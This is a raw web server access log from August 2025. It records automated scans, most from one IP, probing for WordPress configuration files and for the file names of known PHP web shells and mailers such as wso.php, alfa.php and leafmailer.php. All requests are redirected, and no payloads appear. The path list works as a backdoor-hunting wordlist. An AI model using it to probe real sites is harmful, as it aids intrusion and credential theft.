HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:15:01:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:15:01:41 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:15:01:54 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:15:01:54 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:15:01:55 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:15:01:55 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 94.16.113.252 - - [12/Aug/2025:15:02:02 -0400] "GET /wp-includes/wp-apxupx.php?apx=upx HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:02:07 -0400] "GET /wp-includes/pomo/wp-login.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:15:02:43 -0400] "GET /content.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 146.190.11.185 - - [12/Aug/2025:15:06:29 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:15:06:29 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:15:06:29 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:15:06:29 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:15:11:14 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:15:11:14 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:15:11:14 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:15:11:14 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 35.87.29.177 - - [12/Aug/2025:15:15:03 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 34.212.36.145 - - [12/Aug/2025:15:15:07 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 68.183.245.101 - - [12/Aug/2025:15:15:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:15:15:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:15:15:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:15:15:32 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 152.42.157.60 - - [12/Aug/2025:15:23:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:15:23:23 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:15:23:23 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:15:23:23 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:15:26:25 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:15:26:25 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:15:26:25 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:15:26:25 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 41.142.204.231 - - [12/Aug/2025:15:28:51 -0400] "GET /wp-activate.php HTTP/1.1" 301 246 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:28:52 -0400] "GET /wp-blog-header.php HTTP/1.1" 301 249 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:28:53 -0400] "GET /wp-comment.php HTTP/1.1" 301 245 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:28:55 -0400] "GET /wp-comments-post.php HTTP/1.1" 301 251 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:28:56 -0400] "GET /wp-config-sample.php HTTP/1.1" 301 251 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:28:57 -0400] "GET /wp-config.php HTTP/1.1" 301 244 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:28:58 -0400] "GET /wp-cron.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:28:59 -0400] "GET /wp-links-opml.php HTTP/1.1" 301 248 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:00 -0400] "GET /wp-load.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:02 -0400] "GET /wp-login.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:03 -0400] "GET /wp-mail.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:04 -0400] "GET /wp-settings.php HTTP/1.1" 301 246 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:05 -0400] "GET /wp-signup.php HTTP/1.1" 301 244 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:06 -0400] "GET /wp-trackback.php HTTP/1.1" 301 247 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:07 -0400] "GET /xmlrpc.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:08 -0400] "GET //prosellers2.php HTTP/1.1" 301 246 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:10 -0400] "GET //mah.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:11 -0400] "GET //aa.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:12 -0400] "GET //mailer.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:13 -0400] "GET //leafmailer.php HTTP/1.1" 301 245 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:15 -0400] "GET /wordpress.php HTTP/1.1" 301 244 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:16 -0400] "GET //about.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:17 -0400] "GET //chosen.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:18 -0400] "GET //content.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:19 -0400] "GET /shop.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:20 -0400] "GET /r.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:22 -0400] "GET /y.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:23 -0400] "GET /a.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:24 -0400] "GET /b.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:25 -0400] "GET /c.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:26 -0400] "GET /e.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:27 -0400] "GET /zz.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:29 -0400] "GET /aa.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:30 -0400] "GET /upload.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:31 -0400] "GET /wordpress.php HTTP/1.1" 301 244 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:32 -0400] "GET //core.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:33 -0400] "GET //wso112233.php HTTP/1.1" 301 244 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:34 -0400] "GET //zossipei.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:35 -0400] "GET //lf_utchiha.php HTTP/1.1" 301 245 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:37 -0400] "GET //ninjasec.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:38 -0400] "GET //wso.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:39 -0400] "GET //alfanew.php7 HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:40 -0400] "GET //user.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:41 -0400] "GET //utchiha_offer.php HTTP/1.1" 301 248 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:43 -0400] "GET //style.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:44 -0400] "GET //xmlrpc.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:45 -0400] "GET //shell-script.php HTTP/1.1" 301 247 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:46 -0400] "GET //rdpl.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:47 -0400] "GET //simple.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:49 -0400] "GET //atomlib.php HTTP/1.1" 301 242 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:50 -0400] "GET //wso112233.php HTTP/1.1" 301 244 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:51 -0400] "GET //xleet.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:52 -0400] "GET //rain.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:53 -0400] "GET //rdpl.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:54 -0400] "GET //dnvokikk.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:56 -0400] "GET //contents.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:57 -0400] "GET //copy.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:58 -0400] "GET //fw.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:29:59 -0400] "GET //ae.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:00 -0400] "GET //glppziux.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:02 -0400] "GET //x.php HTTP/1.1" 301 236 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:03 -0400] "GET //wso.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:04 -0400] "GET //srx.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:05 -0400] "GET //1337.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 206.189.247.132 - - [12/Aug/2025:15:30:06 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:15:30:06 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:15:30:06 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:15:30:06 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 41.142.204.231 - - [12/Aug/2025:15:30:06 -0400] "GET //ups.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:08 -0400] "GET //doc.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:09 -0400] "GET //xx.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:10 -0400] "GET //XxX.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:11 -0400] "GET //leaf.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:12 -0400] "GET //leafmailer2.8.php HTTP/1.1" 301 248 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:14 -0400] "GET //lf.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:15 -0400] "GET //alex.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:16 -0400] "GET //new.php HTTP/1.1" 301 238 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:17 -0400] "GET //mailer.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:18 -0400] "GET //marijuana.php HTTP/1.1" 301 244 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:19 -0400] "GET //gaza.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:21 -0400] "GET //wp-admin.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:22 -0400] "GET //1index.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:23 -0400] "GET //3index.php HTTP/1.1" 301 241 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:24 -0400] "GET //wikindex.php HTTP/1.1" 301 243 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:26 -0400] "GET //wso1.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:27 -0400] "GET //alfa.php HTTP/1.1" 301 239 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:28 -0400] "GET //priv8.php HTTP/1.1" 301 240 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - - [12/Aug/2025:15:30:29 -0400] "GET //bb.php HTTP/1.1" 301 237 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" 41.142.204.231 - 